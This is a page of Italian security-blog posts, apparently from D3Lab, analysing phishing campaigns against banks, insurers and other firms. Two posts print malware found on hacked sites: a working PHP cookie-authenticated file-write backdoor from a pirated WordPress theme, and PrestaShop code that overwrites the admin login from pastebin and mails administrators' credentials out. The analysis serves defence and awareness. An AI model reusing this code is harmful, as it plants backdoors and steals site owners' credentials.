Articoli di approfondimento sul Phishing Italiano e Internazionale con nozioni tecniche e metodi di prevenzione.

Phishing ai danni di Unipol, in crescita nel 2016!

unipol_login_phishing

Il Phishing è una truffa informatica eseguita tramite una eMail, anche se non mancano i casi in cui il vettore della truffa siano i brevi di messaggi di testo o altri sistemi di comunicazione, che falsifica una comunicazione del proprio Istituto Bancario al fine di frodare il destinatario. Al destinatario viene chiesto di fornire informazioni sensibili (Credenziali, Carta di Credito, Token OTP, ecc) oltre alle proprie generalità.

D3Lab opera attivamente dal 2011 nell’analisi e nel contrasto del Phishing dapprima in Italia ma recentemente anche in altri paesi della comunità Europea, analizzando mediamente oltre 90mila casi univoci al mese di tentativi di Phishing.

I Phisher comunemente concentrano le loro forze solitamente su enti importanti quali PayPal, Apple, Unicredit, Intesa San Paolo, Poste Italiane ecc poiché il bacino di vittime sarà sicuramente maggiore rispetto ad altre piccole realtà bancarie e si presume maggior facilità nell’attrarre delle vittime.

unipol_login_phishing_2

Ma i Phisher per differenziarsi escono a volte dagli schemi, colpendo un target con un bacino di clienti inferiore. Una scelta che viene fatta per scoprire nuovi “territori” vergini o quasi e per sondare il quantitativo di potenziali vittime. Se il target porta interessanti novità il Phisher migliora il kit di Phishing perfezionando il layout web, la comunicazione via eMail, il dominio (sfruttando SSL o creando domini ad-hoc) per ingannare maggiormente la vittima.

Unipol appartiene sicuramente a questa casistica, nel corso del 2016 i casi a suo danno sono aumentanti e il Kit sfruttato per effettuare il Phishing si è perfezionato includendo anche la richiesta del codice OTP oltre a riprodurre perfettamente la pagina di login. Il grafico seguente confronta i casi da noi identificati dal 2012 ad oggi, rispetto al 2015 il 2016 vede un trend di crescita maggiore del 50%.

grafico_phishing_unipol

 

Il Kit di Phishing individuato stamani, a conferma di quanto affermato in precedenza, è probabilmente ad opera dello stesso Team che effettua Phishing ai danni di Unicredit. Infatti analizzando la pagina di richiesta del codice OTP, a seguito del login, troviamo un errato titolo che riporta “Unicredit Conti correnti online”. Probabilmente per la creazione di questo kit è stato sfruttato un template Unicredit e poi personalizzato ad-hoc per Unipol ma il Phisher si è scordato di variare il titolo della pagina.

unicredit_unipol_cedacri

È quindi importante effettuare attività di contrasto e di sensibilizzazione della clientela attraverso il customer service al fine di ridurre i rischi.

/da
pagina fraudolenta Crédit Mutuel

Phishing a danno del Gruppo Crédit Mutuel

Crédit Mutuel è uno dei principali gruppi bancari francesi, partecipato diversi altri istituti e gruppi bancari.

La presenza di più istituti bancari in un unico gruppo, che fanno magari uso della medesima piattaforma di internet banking, consente ai phisher più agguerriti di realizzare campagne di phishing volte a colpire con l’invio di una singola mail i correntisti dei vari istituti facenti parte del gruppo.

Il monitoraggio odierno ha permesso di rilevare nella prime ore della notte un caso di phishing che sfruttando tale schema va ad impattare sui clienti di

  • Credit Mutuel de Bretagne (CMB)
  • Credit Mutuel Massif Central (CMMC)
  • Credit Mutuel Sud Ouest (CMSO)
  • BPE
  • Arkéa Banque Privée (ABP)
  • Fortunéo
  • BEMIX

Continua a leggere

/da
seconda pag. phishing CNAMTS

Phishing a danno delle Casse di previdenza francesi

In Francia la previdenza sociale è suddivisa in tre settori principali:

  • malattia, maternità, invalidità e morte, infortuni sul lavoro e malattie professionali;
  • vecchiaia;
  • famiglia;

gestiti da tre differenti enti:

  • la Cassa nazionale di assicurazione malattia dei lavoratori dipendenti (Caisse nationale d’assurance maladie maternitédes des travailleurs salariés), abbreviato CNAMTS, si occupa del primo;
  • la Cassa nazionale di assicurazione vecchiaia (Caisse nationale d’assurance vieillesse, CNAV ) del secondo;
  • la Cassa nazionale degli assegni familiari (Caisse nationale des allocations familiales, CNAF ) del terzo.

Monitorando il phishing internazionale D3Lab aveva rilevato sin dal 2013 l’interesse dei criminali per la Caisse nationale des allocations familiales,

phishing CNAF url rilevati Continua a leggere

/da

Tema WordPress Warez e Backdoor con autenticazione via Cookie

 

wordpress_themes_warez_backdoor

È ormai una notizia nota che i Temi o i Plugin di WordPress scaricati in maniera illegale, senza corrispondere il corretto compenso allo sviluppatore, contengano spesso Backdoor o Shell nascoste pronte per essere sfruttate per accedere al sito. Nonostante ciò la diffusione di tale materiale è ancora elevata e non mancano certamente gli utilizzatori che pur di risparmiare qualche euro mettano a repentaglio la sicurezza dei propri siti.

La scorsa settimana un sito internet Australiano è stato attaccato e sfruttato per diffondere Phishing ai danni di CartaSi. In collaborazione con il provider abbiamo analizzato il sito web e i relativi LOG per permettergli di contrastare l’accesso abusivo al dominio. Fin da subito abbiamo identificato l’utilizzo di un tema commerciale probabilmente scaricato da siti warez, vista la presenza del file: MafiaShare.net.txt nella directory del tema.

2016-09-28_screenshot_1519090

Successivamente analizzando tutti i file che compongono il tema abbiamo rilevato una backdoord nascosta utilizzabile solo a seguito di autenticazione, realizzata attraverso la lettura di Cookie. La backdoor scritta in PHP permette ad un utente malevolo di scrivere nuovi file sulla spazio web con contenuto arbitrario.

Il file in analisi, che vedete nell’immagine di apertura, è così composto:


/*
Plugin Name: [OMESSO]
Description: A plugin that show posts in column, featured image suported. Responsive supported.
Version: 1.0
Author: [OMESSO]
Author URI: http://www.[OMESSO].com/
*/

<?php
$trenz=$_COOKIE['cookie_name'];
$jban1=$_POST["jban1"];
$jban2=$_POST["jban2"];
$wp_editer=$_POST["wp_editer"];
$jban3=$_POST["jban3"];
if ((isset($trenz)) and ($trenz=="mypassword") and (isset($jban1)))
{
$wp_hasher=  $wp_editer($jban1,$jban2);
$jban3=stripslashes($jban3);
fwrite ($wp_hasher,$jban3);
}
if ((isset($trenz)) and ($trenz=="test"))
{
echo "Testing";
}
?>

Accedendo al fine senza inviare alcuna richiesta POST apparirà la porzione di testo commentata, poiché non correttamente indentato, che fa presupporre la legittimità del file. Ma realmente il file permette di creare nuovi file dal contenuto ed estensione arbitrarie. Per far ciò è però fondamentale creare un Cookie denominato cookie_name contenente il valore mypassword, il precedente script identifica tale cookie e se presente proseguirà nella lavorazione dei parametri POST passati. Parametri che conterranno il nome del file e il suo contenuto.

Quando si sviluppa un sito Internet in WordPress, ma non solo, è quindi fondamentale utilizzare Temi o Plugin distribuiti dai canali ufficiali acquistando ove necessario le relative licenze.

/da

Phishing a danno di Orange FR

L’attività di monitoraggio a livello internazionale ha consentito a D3Lab di rilevare numerosi attacchi di phishing a danno di Orange S.A., la maggior società di telecomunicazioni francese operante nel campo della telefonia mobile, fissa e quale internet service provider, una delle principali aziende mondali del settore.

Gli attacchi gestiti dal 2014 rilevano un notevole incremento soprattutto quest’anno con 412 casi acquisiti sino ad oggi.

20160912150241

 

Continua a leggere

/da

Phishing ai danni della Banca Popolare di Spoleto

phishing-banca-popolare-di-spoleto

Durante l’analisi notturna abbiamo individuato un nuovo ente coinvolto nel Phishing, la Banca Popolare di Spoleto appartenente al Gruppo Banco Desio è un nuovo target per i Phisher e per i relativi cliente della banca.

Il kit sfrutta la codifica base64 per offuscare il sito internet utilizzato per diffondere il Phishing, l’utente riceve una eMail contenete uno short-link che rimanda ad una pagina PHP caricata su un sito compromesso tale pagina inoltrerà nuovamente l’utente ad una pagina locale generata sfruttando la capacità dei recenti browser di visualizzare e decodificare una pagina html in base64. Come è possibile notare nell’immagine di apertura nella barra dell’indirizzo non è presente un normale URL ma una porzione della stringa che genera la pagina HTML locale, per offuscare ulteriormente il tentativo di Phishing la stringa riporta inizialmente https://ihb2.cedaci.it/… che è effettivamente il sito legittimo del homebanking.

Invitiamo come di consueto gli utenti alla massima attenzione quando ricevono eMail di richiesta convalida credenziali.

/1 Commento/da

Phishing CartaSi

L’attività di monitoraggio D3Lab ha consentito di individuare un tentativo di frode volto a colpire i clienti di CartaSi attraverso un messaggio di posta elettronica, con il quale l’utente viene invitato ad aggiornare i dati della carta di credito per motivi di sicurezza.

Continua a leggere

/da

Phishing ai danni di Alitalia – Finto rimborso di 80euro

05Alitalia

Un gruppo di criminali informatici in queste ore sta inviando centinaia di eMail ai danni della compagnia aerea Alitalia: l’utente viene avvisato che in cambio della compilazione di un questionario di gradimento dei servizi offerti dalla compagnia riceverà un rimborso di 80 €. Il promesso rimborso verrà accreditato sulla Carta di Credito del cliente, pertanto concluso il questionario vengono richieste le informazioni personali della vittima, il numero della carta di credito, la data di scadenza, il CVV e il SecureCode.

I dati forniti verranno sfruttati per effettuare acquisti o prelievi di denaro ai danni della vittima, non certamente per emettergli l’atteso rimborso.

Il kit costruito dai Phisher genera ad ogni accesso una nuova cartella casuale, generando da prima un numero casuale tra 0 e 100000, successivamente viene generato Hash MD5 di tale numero e infine codificato in base64. Un esempio della funzione sfruttata dai Phisher:

$random=rand(0,100000);
$md5=md5("$random");
$base=base64_encode($md5);
$dst=md5("$base");
function recurse_copy($src,$dst) { 
...
...

Una volta generata la directory casuale all’interno di essa viene copiato il Kit di Phishing che la vittima visualizzerà. Questa tecnica è utile per eludere le BlackList e quindi l’avviso all’utente che sta visitando una possibile pagina fraudolenta poichè l’URL varierà ad ogni accesso.

Concludiamo con una galleria fotografica delle pagine di Phishing ai danni di Alitalia.

 

Questo slideshow richiede JavaScript.

 

/da

PrestaShop: Alterazione del Pannello di Amministrazione per carpire le credenziali

Presta

Durante l’analisi di un attacco di Phishing ai danni di un nostro cliente, con il supporto dell’amministratore del sito attaccato, abbiamo analizato come gli attaccanti abbiano alterato il Pannello di Amministratore di PrestaShop per inviare le credenziali dell’Admin via eMail.

 

Nel corso dell’ultimo trimestre cinque moduli esterni nel CMS PrestaShop sono risultati vulnerabili ad un attacco di tipo Remote Arbitrary File Upload, attacco che permette di caricare file di proprio piacimento sul sito internet vulnerabile.

Gli exploit, non diffusi attraverso i canonici canali dell’IT Security, permettono di sfruttare la vulnerabilità sui seguenti moduli:

  • simpleslideshow
  • columnadverts
  • productpageadverts
  • soopamobile
  • homepageadvertise

Analizzando il backup che ci è stato cortesemente fornito dall’amministratore del sito compromesso abbiamo rilevato non solo la presenza di diverse web shell protette da password o meno ma la nostra attenzione è ricaduta sull’alterazione del pannello di amministratore.

L’alterazione ha lo scopo di fornire all’attaccante le credenziali del pannello di amministrazione, un efficace sistema per preservare l’accesso al sito, anche dopo una eventuale bonifica delle shell presenti nel sito, aggiornamento dei moduli vulnerabili o un comune cambio password.

Come avviene questa compromissione?

L’attaccante sfrutta uno dei moduli vulnerabili per caricare uno o più file PHP sul sito internet, quello di nostro interesse si chiama do.php esso è suddiviso in due parte. La prima parte esegue l’alterazione del pannello di amministratore, la seconda invece è un semplice uploader per caricare ulteriore materiale sul sito senza sfruttare le vulnerabilità dei moduli.

La nostra attenzione ricade sulla prima parte del file, ovvero:


$sss=array('/','../','../../','../../../','../../../../','../../../../../');
foreach($sss as $pa){
$p1=array("$pa/controllers/admin/AdminLoginController.php","$pa/controllers/AdminLoginController.php");
foreach($p1 as $path){
if (file_exists("$path")){
$html = @file_get_contents('http://pastebin.com/raw/XXXXXXXX');
$save=fopen($path,'w');
fwrite($save,$html);
echo "
./done panel
";
}
}
}
...
...

Questa porzione di codice individua inizialmente la presenza del file AdminLoginController.php, se presente lo sostituisce con il codice PHP pubblicato su PasteBin, il codice pubblicato sul famoso portale riprende integralmente il file originale di PrestaShop ma altera la funzione di verifica delle credenziali:


public function processLogin()
{
/* Check fields validity */
$passwd = trim(Tools::getValue('passwd'));
$email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
if (empty($email)) {
$this->errors[] = Tools::displayError('Email is empty.');
} elseif (!Validate::isEmail($email)) {
$this->errors[] = Tools::displayError('Invalid email address.');
}

if (empty($passwd)) {
$this->errors[] = Tools::displayError('The password field is blank.');
} elseif (!Validate::isPasswd($passwd)) {
$this->errors[] = Tools::displayError('Invalid password.');
}

...
...

La funzione processLogin() ha normalmente il compito di verificare se le credenziali inserite sono corrette, ma attraverso questa alterazione l’attaccante riceverà via eMail le credenziali inserite dall’amministratore.

/1 Commento/da
whois query

Ingegneria Sociale una volta acquisite le credenziali?!

,

In seguito all’attacco rilevato nei giorni scorsi a danno di Cassa di Risparmio di Cesena, D3Lab ha eseguito un’analisi approfondita riguardante il dominio coinvolto.

Analizzando l’host si rileva che è stato creato in data 30-07-2015 come evidenziato nello screenshot sottostante e che risulta essere posizionato su un server ecuadoregno. Continua a leggere

/da